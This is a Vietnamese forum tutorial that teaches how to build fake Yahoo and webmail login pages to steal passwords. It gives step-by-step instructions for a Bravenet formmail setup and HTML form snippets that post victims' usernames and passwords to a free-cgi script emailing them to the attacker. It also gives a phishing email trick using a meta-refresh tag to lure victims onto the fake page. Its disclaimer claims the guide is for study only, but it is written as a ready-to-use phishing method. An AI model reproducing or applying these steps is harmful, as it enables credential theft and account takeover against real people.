Hướng dẫn Fake Login để hack pass yahoo

Hướng dẫn Fake Login :

A.*Bài viết với mục đích học tập. mình không khuyến khích các bạn đi phá hoại và
hoàn toàn không chịu trách nhiệm với bài viết của mình.

bước 1

Các bạn vào http://bravenet.com/ enter email của bạn vào khung như hình trên và
click join

bước2

Sau khi đã click join 1 email sẽ được gửi về cho các bạn. Các bạn checkmail để lấy
code mà bravenet send cho các bạn sau khi join , như hình bên trên code của mình
là 5b8a4fa249

bước 3

Coppy và paste code này vào khung như hình trên của bravenet và click continue
 bước 4

Sau khi click vào continue, sẽ có 1 bản đăng ký như hình trên !

trong ô "choose a user name" các bạn điền tên sử dụng vào. Cái này không quan
trọng và các bạn có thể lấy bất cứ tên gì các bạn thích.

trong ô "choose a password" các bạn chọn lấy 1 password cho mình.Cái này cũng
không quan trọng .

tiếp sau đó là điền first name và last name. Ở đây mình lấy là Alone và Wine!

đánh địa chỉ email nhận password sau này, ở đây mình chọn là
alone2513@yahoo.com.

zipcode , và ngày tháng năm sinh các bạn thự chọn

phần quan trọng nhất là khung "Website URL " phần này các bạn phải browse nó
đến 1 site chuyên về điện hoa hoặc là 1 cái điện hoa cụ thể mà các bạn biết url !
 ok? Khi đã làm xong như trên bạn click vào register như ô bên dưới !

bước 5

Click vào continue như hình trên ! để tiếp tục !

bước 6

Sau khi click continue các bạn tìm mục E-mail Forms / Quickmailer và click vào
register now!

bước 7

Sau đó, trong phần form mail mà nó đưa cho chúng ta các bạn tìm dòng
http://pub4.bravenet.com/emailfwd/sendata..

cùng với dòng value như ở trên value của mình là value = 267961100
OK! các bạn không cần nhớ chi nhiều ! chỉ cần nhớ 2 điều : pub và value của các ban
!

như của mình là pub4 và value = 267961100 . Ok? chuyển qua bước 8.

bước 8

Các bạn click vào đây :

ecard.htm

sau đó viewsoucrecode như hình dưới đây :

Sau đó các bạn tìm dòng "http://pub7.bravenet.com/emailfwd/senddata.php" và

dòng value = 59864935 như ở hình dưới và chỉ việc thay thế pub và giá trị của các
bạn vào . như trong ví dụ này là pub4 va value = 267961100.
Cuối cùng các bạn save as dưới dạng html và upload lên website của các bạn. Bất kỳ
ai login bằng user và password của yahoo qua trang web này của bạn đều bị lấy
password và password sẽ tự động send về hòm thư bạn đăng ký ban đầu .

Các bạn nào chưa làm được bước cuối thì coi hình sau .

Chúc các bạn thành công. Với bất cứ thắc mắc nào bạn có thể post bài lên forum và
mọi người sẽ giúp bạn.Đây là 1 cách để láy password của yahoo.Còn 1 vài cách nữa
mình sẽ post sau.

Bài viết của AloneDrinkWine

Phần bổ sung :

B.Nếu nạn nhân dùng Webmail để nhận thư:

1.Đầu tiên bạn đăng ký 1 địa chỉ email ở hotmail hay bất cứ webmail nào khác.Sau
đó dùng địa chỉ email này để đăng ký 1 host (xem thêm về cách đăng ký host) ở
www.trypod.com hay bất cứ host nào khác hỗ trợ CGI.

2.Việc cần làm tiếp theo là bạn phải làm 1 trang web giả mạo trang webmail của nạn
nhân.Tốt nhất là phải ;àm 1 trang báo lỗi giả mạo để nạn nhân khỏi nghi ngờ.Có 2
cách để có được 2 loại trang báo lỗi

Cách1:Bạn login vào dưới 1 cái tên nào đó bạn bịa ra và password cũng do bạn
bịa.Nó sẽ hiện ra trang báo lỗi rằng bạn đã nhập sai pass..Bạn lưu trang lỗi này lại
cùng với tất cả các hình ảnh.

Cách2:Bạn tạo 1 địa chỉ email trên webmail mà nạn nhân đang sử
dụng(yahoo,hotmail...)Sau đó bạn login vào và đợi khoảng hơn 1 tiếng đồng hồ và
nhấn vào nút SOẠN THƯ(compose,write mesage)

bạn sẽ nhận được trang báo lỗi với các lỗi như:Time out..Bạn cũng lưư trang lỗi này
lại với tất cả hình ảnh của nó.

3.Bạn dùng NOTEPAD hay bất cứ chương trình soạn thảo văn bản nào để biên tập lại
file web lỗi mà bạn đã lưu về

Bước 1.Tìm đến dòng có thẻ: <head>...</head> và thay nó bằng

<noscript><head></head></noscript> để ngăn cái popup quảng cáo của TRYPOD
mục đích là để làm cho nạn nhân khỏi nghi ngờ.

Bước 2.Tìm đến dòng: <form method=post action="xxxxxxxxxxx"> và thay nó

thành <form action="http://www.free-cgi.ch/cgi-bin/formmail-a.cgi" method="get">
<input type="hidden" name="redirect" value="http://xxx.xx"><input type="hidden"
name="recipient" value= "your@email">

your@email chính là địa chỉ emaill mà bạn đã đăng ký lúc đầu và đã dùng nó để

đăng ký host .

Bước 3:Upload file html đó lên host Trypod

Bước 4:Gửi cho nạn nhân một fake email định dạng html .Trong đó bạn điền đoạn
code này:<meta http-equiv="refresh" content="1;url=Địa chỉ trang web lỗi của
bạn"> vào trong thẻ <head></head>

Bây giờ bạn chỉ can ngồi chờ nạn nhân mở mail và khi nạn nhân mở mail trang
webmail sẽ refresh thành trang lỗi của bạn.Khi đó nếu nạn nhân login lại thì đòng
nghĩa với việc 1 email chứa thông tin của nạn nhân(user và pass) sẽ được gửi đến
email của bạn(email lúc đầu mà bạn đã đăng ký).